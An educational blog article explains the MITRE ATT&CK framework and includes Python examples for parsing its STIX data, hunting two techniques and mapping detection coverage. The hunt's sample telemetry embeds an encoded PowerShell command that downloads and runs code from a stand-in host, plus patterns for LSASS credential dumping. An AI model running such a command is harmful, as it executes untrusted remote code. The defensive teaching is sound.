
What is MITRE ATT&CK?

Learn about the MITRE ATT&CK framework, a comprehensive knowledge base of adversary tactics and techniques used in cyberattacks.

By Inventive HQ Team

Understanding MITRE ATT&CK Fundamentals

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a publicly available knowledge base of adversary behavior built from what has been observed in real intrusions rather than from theoretical attack models. It covers criminal, state-sponsored and other adversaries alike, and that empirical grounding is what makes it useful to practitioners from threat hunters and detection engineers to policy makers.

The name describes the framework's structure. Tactics are the "why": the high-level goal an adversary is pursuing at a given stage of an intrusion. Techniques are the "how": the specific methods used to accomplish a tactic. Common Knowledge is the documented record of those techniques in use, including which adversary groups and which software have been observed employing them, and how.

ATT&CK was created by The MITRE Corporation, a not-for-profit research organization, and is maintained with input from security researchers, vendors, government agencies and the wider security community. Its collaborative development and public availability have made it the de facto common reference for describing adversary behavior.

The framework is free and publicly available, making it accessible to organizations of all sizes. This democratization of threat intelligence has transformed how security teams approach defensive operations.

The History and Development of ATT&CK

MITRE ATT&CK began in 2013 as an internal MITRE research effort, known as FMX, aimed at improving detection of adversaries who had already compromised a Windows enterprise network. The team needed a structured way to describe and discuss the behaviors they were trying to detect with endpoint telemetry, so rather than designing a theoretical model they catalogued what adversaries were actually observed doing. The result was released publicly in 2015.

That first version covered Windows enterprise networks. Its success led to expansion into other domains: Mobile (iOS and Android) in 2017, cloud platforms, which were folded into the Enterprise matrix in 2019, and ICS in 2020. Today, ATT&CK comprises several matrices, each documenting adversary behavior in a specific kind of environment.

The framework started with knowledge distilled from intrusion data, research papers, and security vendor publications. Over time, the community has contributed data from real intrusions, transforming ATT&CK into a continuously updated knowledge base.

MITRE regularly updates ATT&CK with new techniques, tactics, and sub-techniques as adversaries evolve their methods. These updates are collaborative—security organizations worldwide contribute observations of new adversary behaviors.

The Structure of ATT&CK

ATT&CK is organized hierarchically: Tactics at the top level, Techniques beneath them, and Sub-techniques providing additional granularity. This structure enables both high-level strategic understanding and detailed tactical knowledge.

Tactics represent the adversary's objectives or goals. Why is the attacker doing something? The Enterprise ATT&CK matrix includes 14 tactics:

ID      Tactic                 What it answers
TA0043  Reconnaissance         What does the adversary learn about the target before attacking?
TA0042  Resource Development   What resources does the adversary build or acquire before the attack?
TA0001  Initial Access         How does the adversary establish a foothold?
TA0002  Execution              How does the adversary run malicious code?
TA0003  Persistence            How does the adversary keep access across restarts, credential changes and other interruptions?
TA0004  Privilege Escalation   How does the adversary gain higher-level permissions?
TA0005  Defense Evasion        How does the adversary avoid being detected?
TA0006  Credential Access      How does the adversary steal account names, passwords, tokens or keys?
TA0007  Discovery              What does the adversary learn about the environment once inside?
TA0008  Lateral Movement       How does the adversary move between systems in the network?
TA0009  Collection             What data does the adversary gather?
TA0011  Command and Control    How does the adversary communicate with compromised systems?
TA0010  Exfiltration           How does the adversary get the data out of the network?
TA0040  Impact                 How does the adversary manipulate, interrupt or destroy systems and data?

The rows follow the order of the matrix columns, which is why Command and Control (TA0011) appears before Exfiltration (TA0010).

For a detailed breakdown of each tactic with examples, see our guide on ATT&CK tactics vs. techniques.

Each tactic contains multiple techniques, the specific methods for achieving that goal. Under Initial Access, for example, the techniques include Phishing (T1566), Exploit Public-Facing Application (T1190) and Supply Chain Compromise (T1195). The Enterprise matrix currently holds roughly 200 techniques and well over 400 sub-techniques; the exact counts change with every release. A technique can also appear under more than one tactic when it serves more than one goal: Valid Accounts (T1078) is listed under Initial Access, Persistence, Privilege Escalation and Defense Evasion.

Sub-techniques provide even greater specificity. For example, the Phishing technique includes sub-techniques like Phishing: Spearphishing Attachment (T1566.001), Phishing: Spearphishing Link (T1566.002), and Phishing: Spearphishing via Service (T1566.003). This three-level hierarchy—tactic → technique → sub-technique—balances strategic overview with operational detail.
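As an added example (not code from the page or from MITRE), here is how the tactic → technique → sub-technique hierarchy looks when read from the STIX 2.1 data MITRE publishes: techniques are attack-pattern objects whose kill_chain_phases name the tactics they belong to, tactics are x-mitre-tactic objects, and a sub-technique points at its parent through a subtechnique-of relationship. The bundle in the block is constructed by hand with a handful of real ATT&CK IDs and fake STIX UUIDs; the real enterprise-attack.json in the mitre-attack/attack-stix-data repository has the same shapes but tens of thousands of objects. The T9999 entry is a hypothetical ID included only to show that revoked objects remain in the export and have to be filtered out.

```python
"""Tactic -> technique -> sub-technique hierarchy from ATT&CK's STIX 2.1 export.

Added example, not code from the page or from MITRE. MITRE publishes ATT&CK as STIX 2.1
bundles (github.com/mitre-attack/attack-stix-data): techniques are attack-pattern objects,
tactics are x-mitre-tactic objects, and a sub-technique is tied to its parent by a
subtechnique-of relationship. The bundle below is constructed by hand in those shapes.
"""
from collections import defaultdict


def _uuid(n):
    # Fake but well-formed UUIDs for the constructed objects.
    return f"00000000-0000-4000-8000-{n:012x}"


def _obj(stix_type, n, ext_id, name, **extra):
    # Minimal STIX object carrying the ATT&CK ID in its mitre-attack external reference.
    return {"type": stix_type, "id": f"{stix_type}--{_uuid(n)}", "name": name,
            "external_references": [{"source_name": "mitre-attack", "external_id": ext_id}],
            **extra}


def _technique(n, ext_id, name, tactics, sub=False, **extra):
    phases = [{"kill_chain_name": "mitre-attack", "phase_name": t} for t in tactics]
    return _obj("attack-pattern", n, ext_id, name,
                kill_chain_phases=phases, x_mitre_is_subtechnique=sub, **extra)


def _subtechnique_of(n, sub_n, parent_n):
    return {"type": "relationship", "id": f"relationship--{_uuid(n)}",
            "relationship_type": "subtechnique-of",
            "source_ref": f"attack-pattern--{_uuid(sub_n)}",
            "target_ref": f"attack-pattern--{_uuid(parent_n)}"}


# Constructed bundle: real ATT&CK IDs and names, fake STIX IDs. T9999 is hypothetical.
SAMPLE_BUNDLE = {"type": "bundle", "id": f"bundle--{_uuid(0)}", "objects": [
    _obj("x-mitre-tactic", 0xA1, "TA0001", "Initial Access", x_mitre_shortname="initial-access"),
    _obj("x-mitre-tactic", 0xA2, "TA0003", "Persistence", x_mitre_shortname="persistence"),
    _obj("x-mitre-tactic", 0xA3, "TA0004", "Privilege Escalation", x_mitre_shortname="privilege-escalation"),
    _obj("x-mitre-tactic", 0xA4, "TA0005", "Defense Evasion", x_mitre_shortname="defense-evasion"),
    _technique(0xB1, "T1566", "Phishing", ["initial-access"]),
    _technique(0xB2, "T1566.001", "Spearphishing Attachment", ["initial-access"], sub=True),
    _technique(0xB3, "T1566.002", "Spearphishing Link", ["initial-access"], sub=True),
    # A technique can serve several tactics; Valid Accounts really is listed under all four.
    _technique(0xB4, "T1078", "Valid Accounts",
               ["defense-evasion", "persistence", "privilege-escalation", "initial-access"]),
    # Revoked and deprecated objects are kept in the export and must be skipped.
    _technique(0xB5, "T9999", "Retired Technique (hypothetical)", ["persistence"], revoked=True),
    _subtechnique_of(0xC1, 0xB2, 0xB1),
    _subtechnique_of(0xC2, 0xB3, 0xB1),
]}


def attack_id(obj):
    """ATT&CK external ID (T1566, T1566.001, TA0001, ...) of a STIX object, or None."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def build_hierarchy(bundle):
    """Return {tactic_id: {technique_id: [sub_technique_ids]}} from the live objects only."""
    live = [o for o in bundle["objects"]
            if not o.get("revoked") and not o.get("x_mitre_deprecated")]
    tactic_by_shortname = {o["x_mitre_shortname"]: attack_id(o)
                           for o in live if o["type"] == "x-mitre-tactic"}
    patterns = {o["id"]: o for o in live if o["type"] == "attack-pattern"}
    parent_of = {r["source_ref"]: r["target_ref"] for r in live
                 if r["type"] == "relationship" and r["relationship_type"] == "subtechnique-of"}

    hierarchy = defaultdict(dict)
    for obj in patterns.values():  # parents first: one entry per tactic they appear under
        if obj.get("x_mitre_is_subtechnique"):
            continue
        for phase in obj.get("kill_chain_phases", []):
            if phase["kill_chain_name"] == "mitre-attack" and phase["phase_name"] in tactic_by_shortname:
                hierarchy[tactic_by_shortname[phase["phase_name"]]][attack_id(obj)] = []
    for stix_id, obj in patterns.items():  # then attach sub-techniques under their parent
        if not obj.get("x_mitre_is_subtechnique"):
            continue
        parent = patterns.get(parent_of.get(stix_id))
        if parent is None:
            continue  # orphan: parent revoked or relationship missing
        for techniques in hierarchy.values():
            if attack_id(parent) in techniques:
                techniques[attack_id(parent)].append(attack_id(obj))
    return {ta: {t: sorted(subs) for t, subs in techs.items()} for ta, techs in hierarchy.items()}


def tactics_for(hierarchy, technique_id):
    """Every tactic a technique is listed under (the 'why' behind a given 'how')."""
    return sorted(ta for ta, techs in hierarchy.items() if technique_id in techs)


if __name__ == "__main__":
    tree = build_hierarchy(SAMPLE_BUNDLE)
    for ta in sorted(tree):
        for tid, subs in sorted(tree[ta].items()):
            print(f"{ta} -> {tid} -> {subs}")
    print("T1078 appears under", tactics_for(tree, "T1078"))
```

Two details matter when you run this against the real export: filter on revoked and x_mitre_deprecated before building anything, because retired techniques stay in the bundle, and resolve parents through the subtechnique-of relationship rather than by string-splitting the ID, since that relationship is what ATT&CK actually maintains.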

Adversary Groups in ATT&CK

ATT&CK documents known adversary groups and their characteristic behaviors. Rather than relying on any one vendor's naming scheme, MITRE assigns each group an identifier (a G-number, for example G0016 for the group widely known as APT29) and records the aliases that vendors and researchers use for it.

For each group, ATT&CK documents the techniques and software that group has been reported using, with references to the public reporting. This lets analysts compare observed activity against known group profiles. Treat the comparison as a lead, not an attribution: many techniques (phishing, PowerShell, credential dumping) are used by hundreds of actors, so overlap with a group's profile only becomes meaningful when the rarer techniques, the tooling and the targeting also line up.

This knowledge is invaluable for incident response, threat hunting, and defensive prioritization. Understanding which groups target your industry helps focus security investments on the most relevant threats.

Software and Tools in ATT&CK

ATT&CK also documents software used in attacks. Each entry has an S-number and is classified either as malware or as a tool, the latter covering legitimate utilities repurposed by adversaries (living-off-the-land activity). Mimikatz (S0002) and PsExec (S0029) are two well-known entries.

Each tool is mapped to techniques it implements. This helps defenders understand what capabilities attackers might gain if they use specific malware or tools. If you detect a tool on your network, ATT&CK tells you what techniques and capabilities that tool provides.

This documentation helps security teams understand attack toolkits comprehensively. Rather than just knowing malware X exists, you know what X is designed to do and what techniques it implements.

The Practical Value of ATT&CK

ATT&CK provides a common language for security discussions. Rather than vague descriptions, teams can reference specific technique identifiers (T-numbers). "We detected T1083 (File and Directory Discovery)" is precise and understood globally.

For defensive prioritization, ATT&CK helps identify which techniques matter most for your organization. If certain techniques are commonly used against your industry and you haven't defended against them, that's a gap worth addressing.

ATT&CK enables objective assessment of your defensive capabilities. You can map your detection and prevention capabilities to specific ATT&CK techniques, identifying coverage gaps.

For threat hunting, ATT&CK provides a systematic framework. Rather than randomly searching for indicators of compromise, you can systematically hunt for each technique an adversary might use.

For incident response, ATT&CK helps understand adversary objectives and next steps. Recognizing tactics helps predict what an attacker might do next.

ATT&CK Matrices

MITRE maintains multiple matrices tailored to different environments:

Enterprise: The primary matrix, covering Windows, Linux, macOS, network devices, containers and cloud platforms (IaaS, SaaS, office suites and identity providers). Cloud techniques were never a separate matrix: they were added to Enterprise in ATT&CK v6 (October 2019), and v9 (April 2021) consolidated the AWS, Azure and GCP platforms into a single IaaS platform and added Containers. Within the Enterprise matrix, the platform selector filters the techniques down to the environment you care about.

Mobile: Covers iOS and Android, documenting mobile-specific attack methods.

ICS (Industrial Control Systems): Covers tactics and techniques specific to attacking industrial control systems and critical infrastructure.

Each matrix uses the same tactic-and-technique structure but with tactics and techniques specific to its environment. The ICS matrix, for instance, has its own tactics such as Inhibit Response Function and Impair Process Control, and it does not currently use sub-techniques.

How Organizations Use ATT&CK

ATT&CK supports four primary use cases, each building on the framework's structured approach to adversary behavior:

Detection Engineering and Coverage Assessment: Security teams map their detection rules to ATT&CK techniques to identify which attacks they can detect and where gaps exist. By visualizing coverage with the ATT&CK Navigator, teams can objectively assess their defensive posture and prioritize investments in the areas that matter most.

Threat Hunting: Rather than waiting for alerts, threat hunters proactively search for adversary activity using ATT&CK as a systematic guide. Hunting for specific techniques (OS Credential Dumping, T1003, or PowerShell, T1059.001, for example) is more effective than searching for indicators because a behavior changes far more slowly than the hashes, domains and tools an attacker can rotate at will. The hunt starts by deciding what the technique looks like in your telemetry.

Red Teaming and Adversary Emulation: Red teams use ATT&CK to design realistic exercises that simulate documented adversary behavior. Rather than arbitrary attacks, ATT&CK-based exercises test defenses against techniques actually used by threat groups targeting your industry.

Vendor Evaluation: ATT&CK provides an objective basis for comparing security products. The MITRE ATT&CK Evaluations (run under MITRE Engenuity) test vendor platforms against emulations of documented adversary behavior and publish, step by step, how each product detected the activity and, in the protection tests, whether it blocked it. Two caveats apply: MITRE does not score, rank or declare winners, so reading the results requires understanding the detection categories and the emulated adversary, and the evaluations test the product as configured by the vendor, not your deployment of it. They remain the closest thing to standardized testing for detection and response products; platforms like CrowdStrike Falcon consistently perform well in them. See our MDR vendor performance benchmarks for a comparison of evaluation results across leading providers. Organizations that lack the in-house expertise to act on ATT&CK-based assessments can use a 24/7 detection and response service that maps alerts to ATT&CK techniques around the clock.
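The threat-hunting use case above, as an added example (not code from the page): rather than searching for hashes, pick two techniques, T1059.001 (Command and Scripting Interpreter: PowerShell) and T1003.001 (OS Credential Dumping: LSASS Memory), decide what each looks like in telemetry, and run that logic over process events. The records below are constructed to resemble Sysmon Event ID 1 (process creation) and Event ID 10 (process access) as a SIEM hands them back as JSON; the field names follow Sysmon, while the hosts, users and the encoded command are made up. The allowlist of legitimate lsass.exe readers is an assumption you would tune to your own environment.

```python
"""Technique-driven hunt over process telemetry for two Enterprise ATT&CK techniques.

Added example, not code from the page or from MITRE. The records below are constructed
to look like Sysmon Event ID 1 (process creation) and Event ID 10 (process access) as a
SIEM returns them as JSON; field names follow Sysmon's, the values are made up.
"""
import base64
import binascii
import re

TECHNIQUES = {
    "T1059.001": ("Command and Scripting Interpreter: PowerShell", "TA0002 Execution"),
    "T1003.001": ("OS Credential Dumping: LSASS Memory", "TA0006 Credential Access"),
}

# Constructed payload: PowerShell -EncodedCommand takes base64 of UTF-16LE text.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "User": "CORP\\alice",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"EventID": 1, "Computer": "WS02", "User": "CORP\\svc_backup",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"EventID": 10, "Computer": "WS01",
     "SourceImage": "C:\\Users\\alice\\AppData\\Local\\Temp\\procdump64.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "Computer": "WS02",
     "SourceImage": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18\\MsMpEng.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Computer": "WS03", "SourceImage": "C:\\Windows\\System32\\Taskmgr.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"},
]

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the same switch.
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                  "net.webclient", "frombase64string")
PROCESS_VM_READ = 0x0010  # the access right needed to read LSASS memory
# Assumed allowlist of legitimate lsass readers; tune to your own environment.
LSASS_READERS_ALLOWLIST = ("msmpeng.exe", "csrss.exe", "wininit.exe")


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_powershell(ev):
    """T1059.001: encoded PowerShell whose decoded body looks like a download cradle."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return None
    decoded = decode_encoded_command(ev.get("CommandLine", ""))
    if decoded is None or not any(marker in decoded.lower() for marker in CRADLE_MARKERS):
        return None
    return {"technique": "T1059.001", "host": ev["Computer"], "evidence": decoded}


def check_lsass_access(ev):
    """T1003.001: a non-allowlisted process opening lsass.exe with PROCESS_VM_READ."""
    if ev.get("EventID") != 10 or _basename(ev.get("TargetImage", "")) != "lsass.exe":
        return None
    if int(ev.get("GrantedAccess", "0x0"), 16) & PROCESS_VM_READ == 0:
        return None  # e.g. 0x1000 QUERY_LIMITED_INFORMATION from Task Manager
    source = _basename(ev.get("SourceImage", ""))
    if source in LSASS_READERS_ALLOWLIST:
        return None
    return {"technique": "T1003.001", "host": ev["Computer"],
            "evidence": f"{source} -> lsass.exe {ev['GrantedAccess']}"}


def hunt(events):
    """Run every technique check over the telemetry; annotate hits with name and tactic."""
    findings = []
    for ev in events:
        for check in (check_powershell, check_lsass_access):
            hit = check(ev)
            if hit:
                name, tactic = TECHNIQUES[hit["technique"]]
                findings.append({**hit, "name": name, "tactic": tactic})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['technique']} {f['name']} [{f['tactic']}] on {f['host']}: {f['evidence'][:60]}")
```

The two checks encode the behavior, not the artifact: the PowerShell check decodes the command rather than matching a known string, and the LSASS check keys on the access mask and the calling process rather than on procdump's hash, so renaming the binary or re-encoding the payload does not evade either one. Each finding carries its technique and tactic IDs, which is what lets the result feed a coverage map or an incident timeline instead of a one-off alert.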

Common Misconceptions About ATT&CK

ATT&CK isn't a prioritized list. It's not ordered by importance or frequency. Every technique in ATT&CK has been observed in real attacks, but frequencies vary.

ATT&CK isn't a framework for building security programs. It documents adversary behavior, not how to defend against it. Control frameworks such as NIST SP 800-53 and the CIS Controls have published mappings to ATT&CK techniques, and MITRE's companion D3FEND catalogue describes defensive countermeasures, but none of these is part of ATT&CK itself.

ATT&CK isn't just for large enterprises. Organizations of all sizes benefit from understanding these techniques. Even if sophisticated APTs aren't your primary concern, techniques in ATT&CK are used by various threat actors at all sophistication levels.

ATT&CK isn't static. It evolves constantly as new attack methods are discovered and documented. Staying current with ATT&CK updates is important.

Using ATT&CK in Your Organization

Start by reviewing the techniques relevant to your industry and organization type. What techniques do attackers commonly use against companies like yours?

Map your detections to ATT&CK techniques. Which techniques can you detect? Which can you prevent? Where are the gaps?

Use ATT&CK for threat hunting. Select a technique, search your logs and systems for indicators of that technique, and remediate if found.

Incorporate ATT&CK into incident response. When you detect activity, map it to ATT&CK techniques to understand the attack, predict next steps, and inform response actions.

Train your security team using ATT&CK. Ensure everyone understands the framework and can reference it in discussions and documentation.

ATT&CK Tools and Resources

MITRE provides the ATT&CK Navigator, a browser-based tool for exploring and annotating the matrix. You can color-code techniques you can detect, techniques you lack coverage for, or techniques used by a specific adversary, and compare layers side by side. Layers are plain JSON files, so they can be generated from your own detection inventory and imported.
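The coverage-mapping steps in the previous section and the Navigator layer mentioned here, as an added example (not code from the page or from MITRE): take a detection inventory whose rules carry ATT&CK technique tags in the Sigma convention (attack.t1059.001 and so on), work out which techniques have a production rule, summarize coverage per tactic, and write the result as a Navigator layer. The rules and the technique-to-tactic table are constructed; the table is a hand-picked subset of the Enterprise matrix, not the whole matrix, and the layer fields follow Navigator layer format 4.5 as documented in the attack-navigator repository, so check them against the Navigator version you run.

```python
"""Detection coverage against ATT&CK, and an ATT&CK Navigator layer built from it.

Added example, not code from the page or from MITRE. Rules are tagged in the Sigma
convention (attack.t1059.001). TECHNIQUE_TACTICS is a hand-picked subset of the
Enterprise matrix, not the full matrix; the layer fields follow Navigator layer format 4.5.
"""
import json
import re
from collections import defaultdict

TACTICS = {"TA0001": "Initial Access", "TA0002": "Execution", "TA0003": "Persistence",
           "TA0006": "Credential Access", "TA0008": "Lateral Movement",
           "TA0011": "Command and Control"}

# technique -> tactics it is listed under (subset of the Enterprise matrix)
TECHNIQUE_TACTICS = {
    "T1566.001": ["TA0001"], "T1566.002": ["TA0001"], "T1190": ["TA0001"],
    "T1059.001": ["TA0002"], "T1059.003": ["TA0002"], "T1047": ["TA0002"],
    "T1053.005": ["TA0002", "TA0003"],  # Scheduled Task counts for both tactics
    "T1547.001": ["TA0003"],
    "T1003.001": ["TA0006"], "T1003.003": ["TA0006"], "T1110.003": ["TA0006"],
    "T1021.001": ["TA0008"], "T1021.002": ["TA0008"],
    "T1071.001": ["TA0011"], "T1105": ["TA0011"],
}

# Constructed detection inventory; rule ids and statuses are made up.
RULES = [
    {"id": "ps-encoded-cradle", "status": "production", "tags": ["attack.execution", "attack.t1059.001"]},
    {"id": "lsass-read", "status": "production", "tags": ["attack.credential_access", "attack.t1003.001"]},
    {"id": "sam-hive-dump", "status": "production", "tags": ["attack.credential_access", "attack.t1003.002"]},
    {"id": "rdp-lateral", "status": "test", "tags": ["attack.lateral_movement", "attack.t1021.001"]},
    {"id": "macro-attachment", "status": "production", "tags": ["attack.initial_access", "attack.t1566.001"]},
    {"id": "schtask-create", "status": "production",
     "tags": ["attack.persistence", "attack.execution", "attack.t1053.005"]},
]

TECHNIQUE_TAG = re.compile(r"^attack\.(t\d{4}(?:\.\d{3})?)$", re.IGNORECASE)


def techniques_from_tags(tags):
    """Extract ATT&CK technique IDs from Sigma-style tags; tactic tags are ignored."""
    ids = []
    for tag in tags:
        m = TECHNIQUE_TAG.match(tag)
        if m:
            ids.append(m.group(1).upper())
    return ids


def coverage(rules, statuses=("production",)):
    """Return (technique -> set of rule ids, technique IDs absent from the table).

    Only rules in an accepted status count: a rule still in test gives no coverage yet.
    """
    covered = defaultdict(set)
    unknown = set()
    for rule in rules:
        if rule["status"] not in statuses:
            continue
        for tid in techniques_from_tags(rule["tags"]):
            if tid in TECHNIQUE_TACTICS:
                covered[tid].add(rule["id"])
            else:
                unknown.add(tid)  # typo, retired ID, or a technique missing from the table
    return dict(covered), unknown


def tactic_coverage(covered):
    """Per tactic: (techniques with at least one rule, techniques in the table)."""
    hit, total = defaultdict(int), defaultdict(int)
    for tid, tactics in TECHNIQUE_TACTICS.items():
        for ta in tactics:
            total[ta] += 1
            hit[ta] += tid in covered
    return {ta: (hit[ta], total[ta]) for ta in TACTICS}


def navigator_layer(covered, name="Detection coverage"):
    """Navigator layer whose score is the number of production rules per technique."""
    techniques = []
    for tid in sorted(TECHNIQUE_TACTICS):
        rules = sorted(covered.get(tid, ()))
        techniques.append({"techniqueID": tid, "score": len(rules),
                           "comment": ", ".join(rules) or "no production detection"})
    return {
        "name": name,
        "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "score = number of production rules mapped to the technique",
        "gradient": {"colors": ["#ffffff", "#66b032"], "minValue": 0, "maxValue": 3},
        "techniques": techniques,
    }


if __name__ == "__main__":
    covered, unknown = coverage(RULES)
    for ta, (hit, total) in tactic_coverage(covered).items():
        print(f"{ta} {TACTICS[ta]:<20} {hit}/{total} techniques covered")
    print("unmapped technique IDs:", sorted(unknown))
    with open("coverage-layer.json", "w") as fh:
        json.dump(navigator_layer(covered), fh, indent=2)
```

Open coverage-layer.json in Navigator to see the heat map. Two points the numbers make that a rule list alone does not: a rule still in test buys no coverage, so the Lateral Movement row stays at zero even though a rule exists, and the unmapped set catches tags that point at IDs your table does not know, which after an ATT&CK release is how you notice a rule still referencing a retired technique. Treat "one rule per technique" as the floor, not the goal: a technique with one narrow rule is nowhere near fully covered.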

Security vendors integrate ATT&CK into their platforms, enabling automated technique mapping of detections.

Open-source tools and scripts help analyze logs and correlate findings to ATT&CK techniques.

Dozens of training courses teach ATT&CK and how to apply it.

Getting Started with ATT&CK

If you're new to ATT&CK, start with these resources in order:

  1. Understand tactics vs. techniques — Learn the fundamental hierarchy that organizes ATT&CK
  2. Explore sub-techniques — Understand the granular detail that makes ATT&CK actionable for detection engineering
  3. Use the ATT&CK Navigator — Visualize the framework and create coverage maps
  4. Understand data sources — Learn what telemetry you need to detect specific techniques
  5. Map your detections — Systematically assess your defensive coverage
  6. Start threat hunting — Proactively search for adversary activity using ATT&CK as your guide
  7. Plan red team exercises — Test your defenses against realistic adversary behavior

Conclusion

MITRE ATT&CK is the industry-standard framework for understanding how adversaries actually attack. It documents real-world tactics and techniques observed in actual cyberattacks, providing actionable intelligence for defensive operations. Understanding ATT&CK enables security teams to speak a common language, prioritize defenses effectively, and conduct systematic threat hunting. Whether you're responding to incidents, evaluating security vendors, or planning defensive improvements, ATT&CK provides the framework for understanding and defending against real-world threats.
